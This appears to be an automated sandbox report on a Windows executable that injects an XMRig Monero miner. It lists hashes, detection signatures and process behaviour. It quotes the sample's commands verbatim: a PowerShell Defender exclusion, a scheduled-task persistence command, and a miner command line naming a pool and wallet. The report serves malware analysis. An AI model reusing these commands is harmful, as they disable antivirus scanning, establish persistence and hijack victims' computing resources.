Analysis
- max time kernel: 69s
- max time network: 134s
- platform: windows7_x64
- resource: win7-20221111-en
- resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
- submitted: 06/02/2023, 13:10
Static task: static1
Behavioral task: behavioral1
- Sample: file.exe
- Resource: win7-20221111-en
General
- Target: file.exe
- Size: 1.9MB
- MD5: d1949ae00330d3c0f7cc282d2f6952cc
- SHA1: f94a50cdd1aff1fe2f7f4135647df2a680ac3e79
- SHA256: 0f1f360e32236b3af68ae241d8604a202c3de6d93603163d2af21364263fceb7
- SHA512: 0f1499ee262e56c4771490fee60c4d76ba8625b6b5004ca73be437c6f17e5a358237c03fc78da07c6a7043ef52252f73cdadd4635c5eef38dbe5cc3fd36b2730
- SSDEEP: 24576:Nx2pKMUGjuNYmUeV5CMl307hOhkMIIj0VOyp2VmmBgbc2vLmmsanDJY++JyBBT9:Nx4U2mV6MV28m9vF2/2c29YjyBBx
Malware Config
Signatures
- XMRig Miner payload (14 IoCs)
  resource / yara_rule:
  - behavioral1/memory/376-103-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-105-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-107-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-108-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-110-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-112-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-113-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-115-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-118-0x0000000140343234-mapping.dmp  xmrig
  - behavioral1/memory/376-117-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-120-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-122-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
  - behavioral1/memory/376-124-0x0000000000000000-0x0000000001000000-memory.dmp  xmrig
  - behavioral1/memory/376-126-0x0000000140000000-0x00000001407C9000-memory.dmp  xmrig
- .NET Reactor protector (3 IoCs)
  Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
  resource / yara_rule:
  - behavioral1/memory/616-70-0x00000000010E0000-0x00000000012BE000-memory.dmp  net_reactor
  - behavioral1/memory/616-123-0x00000000010E0000-0x00000000012BE000-memory.dmp  net_reactor
  - behavioral1/memory/376-124-0x0000000000000000-0x0000000001000000-memory.dmp  net_reactor
- Uses the VBS compiler for execution (1 TTPs)
- Suspicious use of SetThreadContext (1 IoCs)
  description                           pid  Process   procid_target
  PID 616 set thread context of 376     616  file.exe  34
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  1544  schtasks.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid  Process
  616  file.exe
  664  powershell.exe
  616  file.exe
  616  file.exe
- Suspicious behavior: LoadsDriver (1 IoCs)
  pid  Process
  464  Process not Found
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description                   pid  Process
  Token: SeDebugPrivilege       616  file.exe
  Token: SeDebugPrivilege       664  powershell.exe
  Token: SeLockMemoryPrivilege  376  vbc.exe
  Token: SeLockMemoryPrivilege  376  vbc.exe
- Suspicious use of FindShellTrayWindow (1 IoCs)
  pid  Process
  376  vbc.exe
- Suspicious use of WriteProcessMemory (24 IoCs)
  description                        pid   Process   procid_target
  PID 616 wrote to memory of 664     616   file.exe  28   (3 entries)
  PID 616 wrote to memory of 1536    616   file.exe  30   (3 entries)
  PID 1536 wrote to memory of 1544   1536  cmd.exe   32   (3 entries)
  PID 616 wrote to memory of 376     616   file.exe  34   (15 entries)
Processes
- C:\Users\Admin\AppData\Local\Temp\file.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  PID: 616
  Signatures:
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  Child processes:
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    PID: 664
    Signatures:
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"
    PID: 1536
    Signatures:
    - Suspicious use of WriteProcessMemory
    Child processes:
    - C:\Windows\system32\schtasks.exe
      Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"
      PID: 1544
      Signatures:
      - Creates scheduled task(s)
  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
    PID: 376
    Signatures:
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow